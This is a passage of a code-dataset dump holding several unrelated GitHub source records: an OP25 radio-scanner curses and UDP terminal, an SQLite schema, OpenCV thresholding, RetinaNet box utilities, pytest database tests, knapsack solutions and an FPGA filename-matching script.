freq:\n self.send_command('set_freq', freq, int(self.current_msgqid))\n elif c == ord('v'):\n self.prompt.addstr(0, 0, 'Log Level')\n self.prompt.refresh()\n self.text_win.erase()\n response = self.textpad.edit()\n self.prompt.erase()\n self.prompt.refresh()\n self.text_win.erase()\n self.text_win.refresh()\n self.title_help()\n try:\n dbglvl = int(response)\n if dbglvl < 0:\n dbglvl = 0\n except:\n dbglvl = None\n if dbglvl is not None and dbglvl >= 0:\n self.send_command('set_debug', dbglvl, int(self.current_msgqid))\n elif c == ord('H'):\n self.prompt.addstr(0, 0, 'Hold tgid')\n self.prompt.refresh()\n self.text_win.erase()\n response = self.textpad.edit()\n self.prompt.erase()\n self.prompt.refresh()\n self.text_win.erase()\n self.text_win.refresh()\n self.title_help()\n try:\n tgid = int(response)\n if (tgid < 0) or (tgid > 65535):\n tgid = 0\n except:\n tgid = 0\n if tgid:\n self.send_command('hold', tgid, int(self.current_msgqid))\n elif c == ord('W'):\n self.prompt.addstr(0, 0, 'W/L tgid ')\n self.prompt.refresh()\n self.text_win.erase()\n response = self.textpad.edit()\n self.prompt.erase()\n self.prompt.refresh()\n self.text_win.erase()\n self.text_win.refresh()\n self.title_help()\n try:\n tgid = int(response)\n if (tgid < 0) or (tgid > 65534):\n tgid = 0\n except:\n tgid = 0\n if tgid:\n self.send_command('whitelist', tgid, int(self.current_msgqid))\n elif c == ord('B'):\n self.prompt.addstr(0, 0, 'B/L tgid ')\n self.prompt.refresh()\n self.text_win.erase()\n response = self.textpad.edit()\n self.prompt.erase()\n self.prompt.refresh()\n self.text_win.erase()\n self.text_win.refresh()\n self.title_help()\n try:\n tgid = int(response)\n if (tgid < 0) or (tgid > 65534):\n tgid = 0\n except:\n tgid = 0\n if tgid:\n self.send_command('lockout', tgid, int(self.current_msgqid))\n elif c == ord(','):\n self.send_command('adj_tune', -self.sm_step, int(self.current_msgqid))\n elif c == ord('.'):\n self.send_command('adj_tune', self.sm_step, int(self.current_msgqid))\n elif c == ord('<'):\n self.send_command('adj_tune', -self.lg_step, int(self.current_msgqid))\n elif c == ord('>'):\n self.send_command('adj_tune', self.lg_step, int(self.current_msgqid))\n elif (c >= ord('1') ) and (c <= ord('6')):\n self.send_command('toggle_plot', (c - ord('0')), int(self.current_msgqid))\n elif c == ord('d'):\n self.send_command('dump_tgids', 0, int(self.current_msgqid))\n elif c == ord('D'):\n self.send_command('dump_tracking', 0, int(self.current_msgqid))\n elif c == ord('T'):\n self.send_command('set_tracking', -1, int(self.current_msgqid))\n elif c == ord('x'):\n assert 1 == 0\n elif c == curses.KEY_UP:\n pass\n elif c == curses.KEY_DOWN:\n pass\n elif c == curses.KEY_LEFT:\n self.change_chan(-1)\n elif c == curses.KEY_RIGHT:\n self.change_chan(+1)\n return False\n\n def change_chan(self, incr):\n if len(self.channel_list) == 0:\n return\n\n i = self.channel_list.index(self.current_msgqid) if self.current_msgqid in self.channel_list else 0\n i += incr\n if i >= len(self.channel_list):\n i = 0\n elif i < 0:\n i = len(self.channel_list) - 1\n self.current_msgqid = self.channel_list[i]\n\n def process_json(self, js):\n # return true signifies end of main event loop\n msg = json.loads(js)\n if msg['json_type'] == 'trunk_update':\n nacs = [x for x in list(msg.keys()) if x.isnumeric() ]\n if not nacs:\n return\n sysnames = {}\n for nac in nacs:\n if 'system' in msg[nac] and msg[nac]['system'] is not None:\n sysnames[msg[nac]['system']] = nac\n if self.current_sysname in sysnames:\n current_nac = 
str(sysnames[self.current_sysname])\n elif msg.get('nac'):\n current_nac = str(msg['nac'])\n else:\n times = {msg[nac]['last_tsbk']:nac for nac in nacs}\n current_nac = times[ sorted(list(times.keys()), reverse=True)[0] ]\n self.current_nac = current_nac\n s = str(msg[current_nac]['top_line'])\n freqs = sorted(msg[current_nac]['frequencies'].keys())\n s = s[:(self.maxx - 1)]\n self.top_bar.erase()\n self.top_bar.addstr(0, 0, s)\n self.top_bar.refresh()\n self.freq_list.erase()\n for i in range(len(freqs)):\n if i > (self.maxy - 6):\n break\n s=msg[current_nac]['frequencies'][freqs[i]]\n s = s[:(self.maxx - 1)]\n self.freq_list.addstr(i, 0, s)\n self.freq_list.refresh()\n if 'srcaddr' in msg:\n self.status1.erase()\n srcaddr = msg['srcaddr']\n if (srcaddr != 0) and (srcaddr != 0xffffff):\n s = '%d' % (srcaddr)\n s = s[:14]\n self.status1.addstr(0, (14-len(s)), s)\n self.current_srcaddr = srcaddr\n self.status1.refresh()\n if 'encrypted' in msg:\n encrypted = msg['encrypted']\n if self.current_encrypted != encrypted:\n self.status2.erase()\n if encrypted != 0:\n s = 'ENCRYPTED'\n self.status2.addstr(0, (14-len(s)), s, curses.A_REVERSE)\n self.status2.refresh()\n self.current_encrypted = encrypted\n self.stdscr.refresh()\n elif msg['json_type'] == 'change_freq': # from rx.py trunking\n s = 'Frequency %f' % (msg['freq'] / 1000000.0)\n if msg['fine_tune'] is not None:\n s +='(%d)' % msg['fine_tune']\n if msg['error'] is not None:\n s += '(%dHz)' % (msg['error'])\n if msg['tgid'] is not None:\n s += ' Talkgroup ID %s' % (msg['tgid'])\n if msg['tdma'] is not None:\n s += ' TDMA Slot %s' % msg['tdma']\n s = s[:(self.maxx - 16)]\n self.active1.erase()\n self.active2.erase()\n self.active1.addstr(0, 0, s)\n self.active1.refresh()\n s = \"\"\n if msg['tag']:\n s = msg['tag']\n s = s[:(self.maxx - 16)]\n self.active2.addstr(0, 0, s)\n self.active2.refresh()\n self.stdscr.refresh()\n elif msg['json_type'] == 'channel_update': # from multi_rx.py trunking\n if ('channels' not in msg) or (len(msg['channels']) == 0):\n return\n self.channel_list = msg['channels']\n\n # Pick the default channel if specified and this is the first update received.\n if self.default_channel is not None and self.default_channel != \"\":\n for ch_id in self.channel_list:\n if msg[ch_id]['name'] == self.default_channel:\n self.current_msgqid = ch_id\n break\n self.default_channel = None\n\n # Format and display the channel info\n c_id = self.current_msgqid if self.current_msgqid in self.channel_list else self.channel_list[0]\n if 'system' in msg[c_id] and msg[c_id]['system'] is not None:\n self.current_sysname = msg[c_id]['system']\n s = '[%s] %s ' % (c_id, msg[c_id]['name']) if len(msg[c_id]['name']) > 0 else '[%s] ' % (c_id)\n s += 'Frequency %f' % (msg[c_id]['freq'] / 1000000.0)\n if msg[c_id]['ppm'] is not None:\n s += '(%.3f)' % (msg[c_id]['ppm'])\n if msg[c_id]['error'] is not None:\n s += '(%dHz)' % (msg[c_id]['error'])\n if msg[c_id]['capture'] is not None:\n if msg[c_id]['capture'] != self.capture_active:\n self.capture_active = msg[c_id]['capture']\n self.title_help()\n if msg[c_id]['tgid'] is not None:\n s += ' Talkgroup ID %s' % (int(msg[c_id]['tgid']))\n if 'tdma' in msg[c_id] and msg[c_id]['tdma'] is not None:\n s += ' TDMA Slot %s' % int(msg[c_id]['tdma'])\n if 'hold_tgid' in msg[c_id] and msg[c_id]['hold_tgid'] is not None:\n s += ' [HOLD]'\n if 'mode' in msg[c_id]:\n mode = msg[c_id]['mode']\n if mode == 0:\n mode_str = \"Analog\"\n elif mode == 1:\n mode_str = \"Digital\"\n else:\n mode_str = \"\"\n s += \" %s\" 
% mode_str\n s = s[:(self.maxx - 16)]\n self.active1.erase()\n self.active2.erase()\n self.active1.addstr(0, 0, s)\n self.active1.refresh()\n s = \"\"\n if msg[c_id]['tag']:\n s = msg[c_id]['tag']\n s = s[:(self.maxx - 16)]\n self.active2.addstr(0, 0, s)\n self.active2.refresh()\n self.stdscr.refresh()\n if 'srcaddr' in msg[c_id]:\n srcaddr = msg[c_id]['srcaddr']\n if 'srctag' in msg[c_id]:\n srctag = msg[c_id]['srctag']\n else:\n srctag = \"\"\n if srcaddr == 0xffffffff:\n srcaddr = 0\n if self.current_srcaddr != srcaddr:\n self.status1.erase()\n if srctag != \"\":\n s = srctag[:14]\n self.status1.addstr(0, (14-len(s)), s)\n elif srcaddr != 0:\n s = '%d' % (srcaddr)\n s = s[:14]\n self.status1.addstr(0, (14-len(s)), s)\n self.current_srcaddr = srcaddr\n self.status1.refresh()\n if 'encrypted' in msg[c_id]:\n encrypted = msg[c_id]['encrypted']\n if self.current_encrypted != encrypted:\n self.status2.erase()\n if encrypted != 0:\n s = 'ENCRYPTED'\n self.status2.addstr(0, (14-len(s)), s, curses.A_REVERSE)\n self.status2.refresh()\n self.current_encrypted = encrypted\n elif msg['json_type'] == 'terminal_config': # from multi_rx.py\n if 'tuning_step_small' in msg and int(msg['tuning_step_small']) > 0:\n self.sm_step = int(msg['tuning_step_small'])\n if 'tuning_step_large' in msg and int(msg['tuning_step_large']) > 0:\n self.lg_step = int(msg['tuning_step_large'])\n if 'default_channel' in msg and str(msg['default_channel']) != \"\":\n self.default_channel = str(msg['default_channel'])\n \n return False\n\n def process_q_events(self):\n # return true signifies end of main event loop\n while True:\n if curses.is_term_resized(self.maxy, self.maxx) is True:\n self.resize_curses()\n if self.input_q.empty_p():\n break\n msg = self.input_q.delete_head_nowait()\n if msg.type() == -4:\n return self.process_json(msg.to_string())\n return False\n\n def send_command(self, command, arg1 = 0, arg2 = 0):\n if self.sock:\n js = json.dumps({'command': command, 'arg1': arg1, 'arg2': arg2})\n if sys.version[0] > '2':\n if type(js) is str:\n js = js.encode()\n self.sock.send(js)\n else:\n msg = gr.message().make_from_string(command, -2, arg1, arg2)\n if not self.output_q.full_p():\n self.output_q.insert_tail(msg)\n\n def run(self):\n try:\n self.setup_curses()\n\n while(self.keep_running):\n if self.process_terminal_events():\n break\n if self.process_q_events():\n break\n except:\n sys.stderr.write('terminal: exception occurred (%d, %d)\\n' % (self.maxx, self.maxy))\n sys.stderr.write('terminal: exception:\\n%s\\n' % traceback.format_exc())\n finally:\n self.end_terminal()\n self.keep_running = False\n self.send_command('quit', 0)\n\nclass http_terminal(threading.Thread):\n def __init__(self, input_q, output_q, endpoint, **kwds):\n from http_server import http_server\n\n threading.Thread.__init__ (self, **kwds)\n self.setDaemon(1)\n self.input_q = input_q\n self.output_q = output_q\n self.endpoint = endpoint\n self.keep_running = True\n self.server = http_server(self.input_q, self.output_q, self.endpoint)\n self.start()\n\n def get_terminal_type(self):\n return \"http\"\n\n def end_terminal(self):\n self.keep_running = False\n\n def run(self):\n self.server.run()\n\nclass udp_terminal(threading.Thread):\n def __init__(self, input_q, output_q, port, **kwds):\n threading.Thread.__init__ (self, **kwds)\n self.setDaemon(1)\n self.input_q = input_q\n self.output_q = output_q\n self.keep_running = True\n self.port = port\n self.remote_ip = '127.0.0.1'\n self.remote_port = 0\n self.keepalive_until = 0\n\n 
self.setup_socket(port)\n self.q_handler = q_watcher(self.input_q, self.process_qmsg)\n self.start()\n\n def get_terminal_type(self):\n return \"udp\"\n\n def setup_socket(self, port):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.bind(('0.0.0.0', port))\n\n def process_qmsg(self, msg):\n if time.time() >= self.keepalive_until:\n return\n s = msg.to_string()\n if msg.type() == -4 and self.remote_port > 0:\n self.sock.sendto(s, (self.remote_ip, self.remote_port))\n\n def end_terminal(self):\n self.keep_running = False\n\n def run(self):\n while self.keep_running:\n data, addr = self.sock.recvfrom(2048)\n data = json.loads(data)\n if data['command'] == 'quit':\n self.keepalive_until = 0\n continue\n msg = gr.message().make_from_string(str(data['command']), -2, data['arg1'], data['arg2'])\n if not self.output_q.full_p():\n self.output_q.insert_tail(msg)\n self.remote_ip = addr[0]\n self.remote_port = addr[1]\n self.keepalive_until = time.time() + KEEPALIVE_TIME\n\ndef op25_terminal(input_q, output_q, terminal_type):\n if terminal_type == 'curses':\n return curses_terminal(input_q, output_q)\n elif terminal_type[0].isdigit():\n port = int(terminal_type)\n return udp_terminal(input_q, output_q, port)\n elif terminal_type.startswith('http:'):\n return http_terminal(input_q, output_q, terminal_type.replace('http:', ''))\n else:\n sys.stderr.write('warning: unsupported terminal type: %s\\n' % terminal_type)\n return None\n\nclass terminal_client(object):\n def __init__(self):\n self.input_q = gr.msg_queue(10)\n self.keep_running = True\n self.terminal = None\n\n ip_addr = sys.argv[1]\n port = int(sys.argv[2])\n\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.connect((ip_addr, port))\n self.sock.settimeout(0.1)\n\n self.terminal = curses_terminal(self.input_q, None, sock=self.sock)\n\n def run(self): \n while self.keep_running:\n try:\n js, addr = self.sock.recvfrom(2048)\n msg = gr.message().make_from_string(js, -4, 0, 0)\n if not self.input_q.full_p():\n self.input_q.insert_tail(msg)\n except socket.timeout:\n pass\n except:\n raise\n if not self.terminal.keep_running:\n self.keep_running = False\n\nif __name__ == '__main__':\n terminal = None\n try:\n terminal = terminal_client()\n terminal.run()\n except:\n sys.stderr.write('terminal: exception occurred\\n')\n sys.stderr.write('terminal: exception:\\n%s\\n' % traceback.format_exc())\n finally:\n if terminal is not None and terminal.terminal is not None:\n terminal.terminal.end_terminal()\n","repo_name":"boatbod/op25","sub_path":"op25/gr-op25_repeater/apps/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":24377,"program_lang":"python","lang":"en","doc_type":"code","stars":271,"dataset":"github-code","pt":"45"} +{"seq_id":"35217623700","text":"import sqlite3\nimport os\n\nDIRPATH = os.path.dirname(__file__)\nDBFILENAME = \"company.db\"\nDBPATH = os.path.join(DIRPATH, DBFILENAME)\n\ndef schema(DBPATH):\n with sqlite3.connect(DBPATH) as conn:\n cur = conn.cursor()\n\n SQL = \"DROP TABLE IF EXISTS branches;\"\n cur.execute(SQL)\n\n SQL = \"\"\"CREATE TABLE branches(\n pk INTEGER PRIMARY KEY AUTOINCREMENT,\n city VARCHAR(128),\n state VARCHAR (128)\n );\"\"\"\n cur.execute(SQL)\n\n SQL = \"DROP TABLE IF EXISTS employees;\"\n cur.execute(SQL)\n\n SQL = \"\"\"CREATE TABLE employees(\n pk INTEGER PRIMARY KEY AUTOINCREMENT,\n first_name VARCHAR(128),\n last_name VACHAR(128),\n id_num VARCHAR(6),\n is_manager VARCHAR (3),\n branch_pk INTERGER (128),\n FOREIGN KEY (branch_pk) 
REFERENCES branches(pk)\n );\"\"\"\n cur.execute(SQL)\n\n\nif __name__ == \"__main__\":\n schema(DBPATH)","repo_name":"NWood-Git/quiz_12_2_2019","sub_path":"schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"71821686857","text":"import cv2\r\n\r\n#==> Images\r\nimg1=cv2.imread('book1.jpg',cv2.IMREAD_COLOR); #image read in color\r\nimg2=cv2.imread('book2.jpg',cv2.IMREAD_COLOR); #image read in normal color\r\nimg3=cv2.imread('book3.jpg',cv2.IMREAD_COLOR); #image in normal color\r\n\r\n#==.Convert image to gray scale\r\ngray_img=cv2.cvtColor(img1,cv2.COLOR_BGR2GRAY); #convert color from bgr 2 gray\r\n\r\nblur_img=cv2.medianBlur(gray_img,5); #median blur image by 5\r\n\r\nmean=cv2.adaptiveThreshold(blur_img,255,cv2.ADAPTIVE_THRESH_MEAN_C,cv2.THRESH_BINARY,21,2); #create an adaptive thhershold with mean adaptive method\r\n\r\ngaussian=cv2.adaptiveThreshold(blur_img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY,21,2); #create an adaptive threshold wit gaussian adaptive method\r\n\r\ncv2.namedWindow('mean',cv2.WINDOW_NORMAL); #create a named window\r\ncv2.imshow('mean',mean); #Image show in window\r\n\r\ncv2.namedWindow('Gaussian',cv2.WINDOW_NORMAL); #create a named window\r\ncv2.imshow('Gaussian',gaussian); #Image show in window\r\nif cv2.waitKey(0)&0xFF==ord('q'):\r\n cv2.destroyWindow('mean'); #destroy window mean\r\n cv2.destroyWindow('Gaussian'); #destoy window Gaussian\r\n","repo_name":"Chidalu567/Django-Full-completetion","sub_path":"Open cv project/1.4 in reader opencv/Image Thresholding/Adaptive thresholding.py","file_name":"Adaptive thresholding.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"18598257566","text":"import numpy as np\nimport cv2\nimport torch\n\n\ndef prep_im_for_blob(im, pixel_means, pixel_stds, target_sizes, max_size):\n \"\"\"\n Prepare an image for use as a network input blob, specially:\n - Subtract per-channel pixel mean\n - Convert to float32\n - Rescale to each of the specified target size (capped at max_size)\n :param im: the image ndarray\n :param pixel_means: image means for each channel\n :param pixel_stds: image stds for each channel\n :param target_sizes: the target size for rescale the image\n :param max_size: the max size of the longer side in the image\n :return:\n - A list of transformed images, one for each target size. 
Also returns the scale\n factors that were used to compute each returned image.\n \"\"\"\n im = im.astype(np.float32, copy=False) / 255.0\n im -= pixel_means\n im /= pixel_stds\n im_shape = im.shape\n im_size_min = np.min(im_shape[0:2])\n im_size_max = np.max(im_shape[0:2])\n\n ims = []\n im_scales = []\n for target_size in target_sizes:\n im_scale = get_target_scale(im_size_min, im_size_max, target_size, max_size)\n im_resized = cv2.resize(im, None, None, fx=im_scale, fy=im_scale, interpolation=cv2.INTER_LINEAR)\n ims.append(im_resized)\n im_scales.append(im_scale)\n return ims, im_scales\n\n\ndef get_target_scale(im_size_min, im_size_max, target_size, max_size):\n \"\"\"\n Calculate target resize scale\n :param im_size_min: the shorter side of image\n :param im_size_max: the longer side of image\n :param target_size: target size\n :param max_size: max size for the longer side of image\n :return:\n - im_scale: the scale for rescale the image\n \"\"\"\n im_scale = float(target_size) / float(im_size_min)\n # prevent the biggest axis from being more than max_size\n if np.round(im_scale * im_size_max) > max_size:\n im_scale = float(max_size) / float(im_size_max)\n return im_scale\n\n\ndef im_list_to_blob(ims):\n \"\"\"\n Convert a list of images into a network input. Assumes images were\n prepared using prep_im_for_blob or equivalent: i.e.\n - BGR channel order\n - pixel means substracted\n - resized to the desired input size\n - float32 numpy ndarray format\n :param ims:\n :return:\n - a 4D NCHW tensor of the images concatenated along axis 0 with shape.\n \"\"\"\n if not isinstance(ims, list):\n ims = [ims]\n max_shape = get_max_shape([im.shape[:2] for im in ims])\n num_images = len(ims)\n blob = np.zeros((num_images, max_shape[0], max_shape[1], 3), dtype=np.float32)\n for i in range(num_images):\n im = ims[i]\n blob[i, 0:im.shape[0], 0:im.shape[1], :] = im\n # move channels (axis 3) to (axis 1)\n # axis order will become: (batch, channel, height, width)\n channel_swap = (0, 3, 1, 2)\n blob = blob.transpose(channel_swap)\n return blob\n\n\ndef get_max_shape(im_shapes):\n \"\"\"\n Calculate max spatial size (h, w) for batching given a list of image shapes\n :param im_shapes: list of np.array([h, w])\n :return: \n - max_shape: the max_shape in the list of images\n \"\"\"\n max_shape = np.array(im_shapes).max(axis=0)\n assert max_shape.size == 2\n # pad the image so they can be divisible by a stride\n stride = 32\n max_shape[0] = int(np.ceil(max_shape[0] / float(stride)) * stride)\n max_shape[1] = int(np.ceil(max_shape[1] / float(stride)) * stride)\n return max_shape\n\n\ndef meshgrid(x, y, row_major=True):\n \"\"\"\n Return meshgrid in range x & y\n :param x: (int) first dim range\n :param y: (int) second dim range\n :param row_major: (bool) row major or column major.\n :return: (tensor) meshgrid, sized [x*y, 2]\n\n Example:\n >> meshgrid(3, 2)\n 0 0\n 1 0\n 2 0\n 0 1\n 1 1\n 2 1\n [torch.FloatTensor of size 6x2]\n\n >> meshgrid(3, 2, row_major=False)\n 0 0\n 0 1\n 0 2\n 1 0\n 1 1\n 1 2\n [torch.FloatTensor of size 6x2]\n \"\"\"\n a = torch.arange(0, x)\n b = torch.arange(0, y)\n xx = a.repeat(y).view(-1, 1)\n yy = b.view(-1, 1).repeat(1, x).view(-1, 1)\n return torch.cat([xx, yy], 1) if row_major else torch.cat([yy, xx], 1)\n\n\ndef change_box_order(boxes, order):\n \"\"\"\n Change box order between (xmin, ymin, xmax, ymax) and (xcenter, ycenter, width, height).\n :param boxes: (tensor) bounding boxes, sized [N, 4]\n :param order: (str) either 'xyxy2xywh' or 'xywh2xyxy'.\n :return: (tensor) 
converted bounding boxes, size [N, 4]\n \"\"\"\n assert order in ['xyxy2xywh', 'xywh2xyxy']\n a = boxes[:, :2]\n b = boxes[:, 2:]\n if order == 'xyxy2xywh':\n return torch.cat([(a + b) / 2., b - a], 1)\n return torch.cat([a - b / 2., a + b / 2.], 1)\n\n\ndef box_iou(box1, box2, order='xyxy'):\n \"\"\"\n Compute the intersection over union of two set of boxes.\n The default box order is (xmin, ymin, xmax, ymax).\n :param box1: (tensor) bounding boxes, sized [N, 4]\n :param box2: (tensor) bounding boxes, sized [M, 4].\n :param order: (str) box order, either 'xyxy' or 'xywh'\n :return: (tensor) iou, sized [N, M]\n \"\"\"\n if order == 'xywh':\n box1 = change_box_order(box1, 'xywh2xyxy')\n box2 = change_box_order(box2, 'xywh2xyxy')\n\n N = box1.size(0)\n M = box2.size(0)\n\n lt = torch.max(box1[:, None, :2], box2[:, :2]) # [N, M, 2]\n rb = torch.min(box1[:, None, 2:], box2[:, 2:]) # [N, M, 2]\n\n wh = (rb - lt).clamp(min=0) # [N, M, 2]\n inter = wh[:, :, 0] * wh[:, :, 1] # [N, M]\n\n area1 = (box1[:, 2] - box1[:, 0]) * (box1[:, 3] - box1[:, 1]) # [N,]\n area2 = (box2[:, 2] - box2[:, 0]) * (box2[:, 3] - box2[:, 1]) # [N.]\n iou = inter / (area1[:, None] + area2 - inter)\n return iou\n\n\ndef box_nms(bboxes, scores, threshold=0.5, mode='union'):\n \"\"\"\n Non Maximum suppression.\n :param bboxes: (tensor) bounding boxes, size [N, 4]\n :param scores: (tensor) bbox scores, sized [N,].\n :param threshold: (float) overlap threshold\n :param mode: (str) 'union' or 'min'\n :return:\n keep: (tensor) selected indices.\n \"\"\"\n x1 = bboxes[:, 0]\n y1 = bboxes[:, 1]\n x2 = bboxes[:, 2]\n y2 = bboxes[:, 3]\n # import pdb; pdb.set_trace()\n\n areas = (x2 - x1) * (y2 - y1)\n _, order = scores.sort(0, descending=True)\n keep = []\n while order.numel() > 0:\n i = order[0]\n keep.append(i)\n\n if order.numel() == 1:\n break\n\n xx1 = x1[order[1:]].clamp(min=x1[i])\n yy1 = y1[order[1:]].clamp(min=y1[i])\n xx2 = x2[order[1:]].clamp(max=x2[i])\n yy2 = y2[order[1:]].clamp(max=y2[i])\n\n w = (xx2 - xx1).clamp(min=0)\n h = (yy2 - yy1).clamp(min=0)\n inter = w * h\n\n if mode == 'union':\n ovr = inter / (areas[i] + areas[order[1:]] - inter)\n elif mode == 'min':\n ovr = inter / areas[order[1:]].clamp(max=areas[i])\n else:\n raise TypeError('Unknown nms mode: %s.' 
% mode)\n\n ids = (ovr < threshold).nonzero().squeeze()\n if ids.numel() == 0:\n break\n # because the length of the ovr is less than the order by 1\n # so we have to add to ids to get the right one\n order = order[ids + 1]\n return torch.LongTensor(keep)\n\n\ndef one_hot_embedding(labels, num_classes):\n \"\"\"\n Embedding labels to one-hot form.\n\n Args:\n :param labels: (LongTensor) class label, sized [N,].\n :param num_classes: (int) number of classes.\n :return:\n (tensor) encoded labels, size [N, #classes].\n \"\"\"\n y = torch.eye(num_classes) # [D, D]\n return y[labels] # [N, D]\n","repo_name":"wsnedy/pytorch-retinanet","sub_path":"datasets/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"45"} +{"seq_id":"73368717577","text":"import pytest\nimport sqlite3\n\n\ndef test_get_all_phones(phones_repo):\n db = phones_repo\n all_phones = db.get_all()\n assert isinstance(all_phones, list), \"Incorrect type of data, should be list\"\n for phone in all_phones:\n print(phone)\n\n\ndef test_get_phone_by_brand(phones_repo):\n db = phones_repo\n brand_phones = db.get_phone_by_brand(\"Samsung\")\n assert isinstance(brand_phones, list), \"Incorrect type of data, should be list\"\n for phone in brand_phones:\n print(phone)\n\n\ndef test_add_phone(phones_repo, fake_phone):\n db = phones_repo\n db.insert_one(**fake_phone)\n phone = db.get_one_by_id()\n assert isinstance(phone, tuple), \"Incorrect type of phone data, should be tuple\"\n print(phone)\n\n\ndef test_update_full_phone(phones_repo, fake_phone):\n db = phones_repo\n db.insert_one(**fake_phone)\n new_phone = (\"V20\", \"LG\", \"Snapdragon 820\", 2018, 750.0)\n db.update_full_phone(*new_phone)\n upd_phone = list(db.get_one_by_id())\n assert upd_phone[1:] == [\"V20\", \"LG\", \"Snapdragon 820\", 2018, 750.0], \"The changes were not saved\"\n print(upd_phone)\n\n\ndef test_update_phone_model(phones_repo, fake_phone):\n db = phones_repo\n db.insert_one(**fake_phone)\n db.partial_phone_update(model=\"Galaxy S22\")\n upd_phone = list(db.get_one_by_id())\n assert upd_phone[1] == \"Galaxy S22\", \"Incorrect phone model\"\n print(upd_phone)\n\n\ndef test_delete_phone(phones_repo, fake_phone):\n db = phones_repo\n first_max_id = db.get_max_phone_id()\n db.insert_one(**fake_phone)\n db.delete_phone_by_id()\n second_max_id = db.get_max_phone_id()\n assert first_max_id == second_max_id, \"Incorrect max index or item was not deleted\"\n\n\ndef test_get_phone_by_invalid_brand_fails(phones_repo):\n db = phones_repo\n inv_brand = \"Hello\"\n brand_phones = db.get_phone_by_brand(inv_brand)\n assert brand_phones is None, f\"Value of brand_phones should be None, because there is no brand {inv_brand}\"\n\n\ndef test_add_phone_without_model_fails(phones_repo):\n db = phones_repo\n with pytest.raises(sqlite3.IntegrityError, match=\"NOT NULL constraint failed: PHONES.MODEL\"):\n db.insert_one(model=None, brand=\"Huawei\", processor=\"Kirin\", year=2020, price=500.0)\n\n\ndef test_delete_phone_by_wrong_id_fails(phones_repo):\n db = phones_repo\n first_max_id = db.get_max_phone_id()\n inv_id = \"word\"\n db.delete_phone_by_id(inv_id)\n second_max_id = db.get_max_phone_id()\n assert first_max_id == second_max_id, f\"Item was deleted by incorrect id {inv_id}, but 
should`t!\"\n\n\n\n","repo_name":"daryay2001/Pytest_samples","sub_path":"tests/Lesson_23/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"14336555198","text":"## Question 1\r\n\r\nwith open('3 - 4 - Knapsack 1.txt') as f:\r\n\ttemp = f.readline().split()\r\n\tknapsack_size = int(temp[0]) - 1\r\n\tnum_of_items = int(temp[1]) - 1\r\n\tvalues = []\r\n\tweights = []\r\n\tfor line in f:\r\n\t\ttemp = line.split()\r\n\t\tvalues.append(int(temp[0]))\r\n\t\tweights.append(int(temp[1]))\r\n\r\nA = [[0 for x in range(knapsack_size + 1)] for y in range(num_of_items + 1)]\r\n\r\nfor i in range(1, num_of_items + 1):\r\n\tfor x in range(1, knapsack_size + 1):\r\n\t\tif weights[i] >= x:\r\n\t\t\tA[i][x] = A[i-1][x]\r\n\t\telse:\r\n\t\t\tA[i][x] = max(A[i-1][x], A[i-1][x-weights[i]] + values[i])\r\n\r\nprint(A[-1][-1])\r\n\r\n# Answer: 2493893\r\n\r\n## Question 2\r\n\r\nimport sys\r\n\r\ndef knapsack(i, x):\r\n\tif i == -1 or x == 0:\r\n\t\treturn 0\r\n\tif weights[i] >= x:\r\n\t\tif (i-1, x) not in cache:\r\n\t\t\tcache[(i-1, x)] = knapsack(i-1, x)\r\n\t\treturn cache[(i-1, x)]\r\n\telse:\r\n\t\tif (i-1, x) not in cache:\r\n\t\t\tcache[(i-1, x)] = knapsack(i-1, x)\r\n\t\tsolution_without_ith_item = cache[(i-1, x)]\r\n\t\tif (i-1, x-weights[i]) not in cache:\r\n\t\t\tcache[(i-1, x-weights[i])] = knapsack(i-1, x-weights[i])\r\n\t\tsolution_with_ith_item = cache[(i-1, x-weights[i])] + values[i]\r\n\t\treturn max(solution_with_ith_item, solution_without_ith_item)\r\n\r\n\r\nwith open('3 - 4 - Knapsack 2.txt') as f:\r\n\ttemp = f.readline().split()\r\n\tknapsack_size = int(temp[0]) - 1\r\n\tnum_of_items = int(temp[1]) - 1\r\n\tvalues = []\r\n\tweights = []\r\n\tfor line in f:\r\n\t\ttemp = line.split()\r\n\t\tvalues.append(int(temp[0]))\r\n\t\tweights.append(int(temp[1]))\r\n\r\ncache = {}\r\n\r\nsys.setrecursionlimit(2500)\r\n\r\nprint(knapsack(num_of_items, knapsack_size))\r\n\r\n# Answer: 4243395","repo_name":"menduhkesici/Algorithms_by_Stanford","sub_path":"3 - 4 - Knapsack.py","file_name":"3 - 4 - Knapsack.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"5341173606","text":"#!/usr/bin/env python\n\nimport os\nimport re\n\nDIR = './ACQ400_FPGA'\n\nNEWFILES = {}\nOLDFILES = {}\n\nfor file in os.listdir(DIR):\n if file.endswith(\".bit.gz\"):\n fields = re.split('[_\\-\\.]', file)\n# print(fields)\n if '64B' in fields:\n# print(f'{file} 64B found')\n NEWFILES[file] = fields\n elif '32B' in fields:\n# print(f'{file} 32B found')\n NEWFILES[file] = fields\n else:\n OLDFILES[file] = fields\n \n\n\n#print(FILES)\n#print(NOAXI)\n\nnomatch = 0\nmatches = 0\n\nfor oldfile, oldfields in OLDFILES.items():\n if oldfields[0] == 'ACQ1001':\n exact_match = 4\n elif oldfields[0] == 'ACQ2106':\n exact_match = 8\n else:\n exact_match = 3\n for newfile, newfields in NEWFILES.items():\n\n try:\n for fn, of in enumerate(oldfields):\n if fn < exact_match and of != newfields[fn]:\n raise Exception(\"no exact match\")\n elif not of in newfields:\n raise Exception(\"no match\")\n print(f\"{oldfile}\")\n print(f\"XXX {oldfile} is replaced by {newfile}\")\n matches += 1\n break\n except:\n nomatch += 1\n\n\nprint(f\"Total nomatch {nomatch} 